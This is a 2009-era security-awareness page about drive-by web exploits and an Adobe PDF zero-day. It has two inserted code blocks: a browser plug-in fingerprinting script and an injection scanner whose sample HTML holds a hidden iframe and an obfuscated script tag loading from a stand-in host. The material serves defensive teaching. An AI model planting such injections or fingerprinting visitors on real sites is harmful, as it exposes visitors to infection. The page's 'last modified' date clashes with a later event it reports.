The "No Network is 100% Secure" series
- Drive-by web site exploits -
A free, safe test


All rights reserved - may not be copied without permission
Easyrider LAN Pro, NOC Design Consultants


There is absolutely NO malware on this page: do not be alarmed by the various demonstration messages and alerts here. Even so, always be aware that allowing ANY plug-in is a risky proposition these days. Our advice is to always "just say NO!"

What is a drive-by exploit?: A drive-by is an action that is automatically performed on your computer without your consent or even your knowledge. Unlike a pop-up, which asks for assent (albeit in a calculated manner likely to lead to a "yes"), a drive-by can be initiated by simply visiting a web site or viewing an HTML e-mail message. If your computer's security settings are lax, drive-by exploits may succeed without any action on your part.

In addition to downloading malware, drive-by sites commonly probe a visiting computer for any one of dozens of known vulnerabilities, including vulnerabilities for which no patch is currently available. It is estimated that any given computer has an average of eight vulnerabilities, any one of which could allow a visiting computer to be compromised. It is important to note that a large percentage of drive-by sites are legitimate web sites that have themselves been compromised, typically via an SQL injection exploit.

Drive-by infections are a major security issue. In April 2007, researchers at Google discovered hundreds of thousands of Web pages that initiated drive-by exploits. One in ten pages was found to be suspect. Sophos researchers in 2008 reported that they were discovering more than 6,000 new infected Web pages every day, or about one every 14 seconds. Many of these infections are connected to botnets, in which each PC is turned into a zombie that may then be directed to further malicious activity, like spam or DDoS attacks.

This page collects (and displays, for your review) the same types of information that malicious web sites use to attack visiting computers. This information is used to tailor an attack strategy. Not only are the browser and operating system probed for vulnerabilities; drive-by sites also endeavor to learn about any installed application or plug-in that might be vulnerable to attack.

Demonstration: For demonstration purposes, we have disabled the use of your ALT key on this page. This should give you some idea just how much control hackers have over your browsing session and, in fact, over your entire computer. It would be trivial to remap certain keys to get you to unwittingly download a virus. But in reality, there are easier ways to infect your computer without your knowledge. Assume that we have also disabled your mouse (again, trivial to do). Try shutting down your browser session with ALT-F, Close. Doesn't work, huh? Sure, there are ways around what we did (this time), but you can be sure that hackers would plug all of the back doors so that you would be 100% under their control.

Starting to understand why these drive-by sites are so insidious?


Listed below is just some of the information that miscreant hackers know about you when you visit a hacked web site. These sites silently check whether any operating system, application, plug-in or other software is vulnerable. If a vulnerability is found, it is immediately exploited. Users no longer have to actually do something (e.g. open an e-mail attachment) to have a virus or trojan installed on their computer.



- Number of times you have visited this page
- Your IP address
- Plug-ins installed
- MIME types installed
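The items above are read straight from the browser. As an added example (not the page's own script), this reads the same facts from any navigator-like object: plug-in names and versions plus the MIME types each one would open in-page, which is the list a drive-by site consults before choosing what to serve. SAMPLE_NAVIGATOR is constructed so it runs offline; in a browser it uses window.navigator.

```javascript
// Added example, not the page's own script. Summarises what a page can read
// from the navigator object: plug-ins, their versions and the content types
// each plug-in handles. `nav` is any navigator-like object.
function summarizeExposure(nav) {
  const plugins = Array.from(nav.plugins || []).map((p) => ({
    name: p.name,
    version: p.version || '',          // often empty in modern browsers
    description: p.description || '',
    mimeTypes: [],
  }));
  const byName = new Map(plugins.map((p) => [p.name, p]));
  // Each MIME type names the plug-in that would open that content in-page.
  for (const mt of Array.from(nav.mimeTypes || [])) {
    const owner = mt.enabledPlugin && byName.get(mt.enabledPlugin.name);
    if (owner) owner.mimeTypes.push(mt.type);
  }
  return {
    userAgent: nav.userAgent || '',
    pluginCount: plugins.length,
    // Content types a site could serve to reach a plug-in without a click.
    handledTypes: plugins.flatMap((p) => p.mimeTypes).sort(),
    plugins,
  };
}

// Constructed sample navigator; names and versions are illustrative only.
const SAMPLE_NAVIGATOR = {
  userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',
  plugins: [
    { name: 'Adobe Acrobat', description: 'Adobe PDF Plug-In', version: '9.2.0' },
    { name: 'Shockwave Flash', description: 'Shockwave Flash', version: '10.0' },
  ],
  mimeTypes: [
    { type: 'application/pdf', enabledPlugin: { name: 'Adobe Acrobat' } },
    { type: 'application/x-shockwave-flash', enabledPlugin: { name: 'Shockwave Flash' } },
    { type: 'application/futuresplash', enabledPlugin: { name: 'Shockwave Flash' } },
  ],
};

// Use the real navigator when running inside a browser, the sample otherwise.
const target = typeof window !== 'undefined' ? window.navigator : SAMPLE_NAVIGATOR;
console.log(JSON.stringify(summarizeExposure(target), null, 2));
```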
Check your vulnerability to a drive-by exploit: Click on the "How vulnerable am I?" button above to run a (completely safe) test. If a new window does NOT open, you are about as safe as you can be, at least until these hackers come up with some new exploit. Note that you still need to have ALL of your software (not just the operating system) patched to the latest level since there are lots of other ways to pick up trojans and viruses besides visiting a compromised, infected drive-by web site.

Here's another safe little test you can try:

Click on http://easyrider.easyrider.com/hackers_white_paper.htm There is no malicious code on this page! However, around 80,000 legitimate business, church, government and other web sites are currently unknowingly infected with SQL or JavaScript injections. Clicking on the above link will simulate what happens during a so-called "drive-by" infection, except that if you were really infected, you'd never know it. You'd be automatically and instantly redirected to a criminal web site where your computer, browser and various installed applications would be quietly probed for any of dozens of common vulnerabilities. If one or more vulnerabilities are detected, they will immediately and silently be exploited and poof!... your computer is infected. If your browser allows the above URL to come up unchallenged, your users are definitely vulnerable to drive-by exploits. Again, this web page is 100% safe. It is merely a test case example. NOTE: if your AV software scans web sites for safety, it will not detect this type of drive-by in most cases, since the first thing the drive-by does is send your browser to a different web site. It's all over but the crying before your AV software knows what happened.

An important note: And worth repeating... you or your users don't need to actually do anything to be infected by many of the viruses and trojans that are out there, such as Gumblar. Simply visiting a legitimate site such as Walmart or whitehouse.gov, if it's been compromised, is all it takes. There are some 80,000 of these perfectly legitimate web sites that are currently and unknowingly compromised. Once you visit a compromised web site, that's it. You don't have to click on anything; you don't have to do a single thing. And in fact, there's not a thing you can do to prevent getting infected at this point. If your computer is vulnerable to any one of dozens of exploits... some of which do not even have patches available to fix them, you're cooked!
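The two notes above describe the same mechanism: an injected snippet on a legitimate page that silently sends the visitor elsewhere. As an added example (not from the original page), this is the kind of check a site owner can run over their own HTML to spot such an injection before visitors do; it flags invisible iframes, scripts pulled from another host, obfuscated inline script and meta-refresh redirects. SAMPLE_HTML and all host names in it are constructed.

```javascript
// Added example, not the page's own code: scan a page's HTML for the marks
// an SQL or JavaScript injection typically leaves behind.
function scanForInjections(html, pageHost) {
  const findings = [];
  const attr = (attrs, name) => {
    const m = attrs.match(new RegExp('\\b' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i'));
    return m ? (m[1] ?? m[2] ?? m[3]) : null;
  };
  // 1. iframes the visitor cannot see: zero-sized or hidden by style
  for (const m of html.matchAll(/<iframe\b([^>]*)>/gi)) {
    const a = m[1];
    const hidden = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(a) ||
      ['0', '1'].includes(attr(a, 'width')) || ['0', '1'].includes(attr(a, 'height'));
    if (hidden) findings.push({ type: 'hidden-iframe', src: attr(a, 'src') });
  }
  // 2. script loaded from a host other than the page's own
  for (const m of html.matchAll(/<script\b([^>]*)>/gi)) {
    const src = attr(m[1], 'src');
    if (src && /^https?:\/\//i.test(src) && new URL(src).hostname !== pageHost) {
      findings.push({ type: 'third-party-script', src });
    }
  }
  // 3. inline script that decodes a long %XX blob and writes or evals it
  for (const m of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    const body = m[1];
    const decodes = /\b(unescape|eval|String\.fromCharCode)\s*\(/.test(body);
    const encoded = (body.match(/%[0-9a-f]{2}/gi) || []).length;
    if (decodes && encoded >= 20) findings.push({ type: 'obfuscated-inline-script', encodedBytes: encoded });
  }
  // 4. automatic redirect that needs no click at all
  for (const m of html.matchAll(/<meta\b([^>]*)>/gi)) {
    if (/http-equiv\s*=\s*["']?refresh/i.test(m[1])) {
      findings.push({ type: 'meta-refresh', content: attr(m[1], 'content') });
    }
  }
  return findings;
}

// Constructed sample: a shop page carrying a hidden iframe and an escaped
// script tag (decodes to a script element pointing at bad.example).
const SAMPLE_HTML = [
  '<html><body><h1>Welcome to our store</h1>',
  '<iframe src="http://injected.example/in.php" width="0" height="0" style="display:none"></iframe>',
  '<script>document.write(unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%61%64%2E%65%78%61%6D%70%6C%65%2F%22%3E"))</script>',
  '<script src="/js/site.js"></script>',
  '</body></html>',
].join('\n');

console.log(scanForInjections(SAMPLE_HTML, 'shop.example'));
```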

Adobe confirms PDF zero-day attacks. Disable JavaScript now!: If you're like me you probably regret ever installing Adobe. It seems like it's just one vulnerability after another with these guys... and most of the time (like now) there is no patch to correct the problem. Worse still, there is little to no detection of these malicious PDF files from most of the major antivirus vendors.

Malicious hackers are exploiting a zero-day (unpatched) vulnerability in Adobe's ever-present PDF Reader/Acrobat software to hijack data from compromised computers. According to an advisory from Adobe, the critical vulnerability exists in Adobe Reader and Acrobat 9.2 and earlier versions. It is being exploited in the wild as of 12/11/09.

This latest vulnerability is actually in a JavaScript function within Adobe Acrobat [Reader] itself. Furthermore the vulnerable JavaScript is obfuscated inside a zlib stream making universal detection and intrusion detection signatures much more difficult. In the interim, Adobe PDF Reader/Acrobat users are urged to immediately disable JavaScript:

Click: Edit -> Preferences -> JavaScript and uncheck Enable Acrobat JavaScript

Or, better yet, use an alternative PDF Reader software program.



About the Author

Frank Saxton is a computer network security engineer and Easyrider LAN Pro principal. Home-based in Portland, Oregon, Frank has been designing remote diagnostic and network enterprise monitoring centers since the late 1970s. Prior to becoming a professional systems engineering consultant in 1990, Frank had a 20-year career in computer systems field engineering and field engineering management. Frank has a BSEE from Northeastern University and holds several certifications including Network General's Certified Network Expert (CNX). As a NOC design engineer and architect, Frank works regularly with enterprise-class monitoring tools such as HP Openview Operations, BMC Patrol and others. In his enterprise security audit work, Frank uses sniffers and other professional grade monitoring tools on a daily basis.



Last modified March 25, 2009
Copyright 1990-2009 Easyrider LAN Pro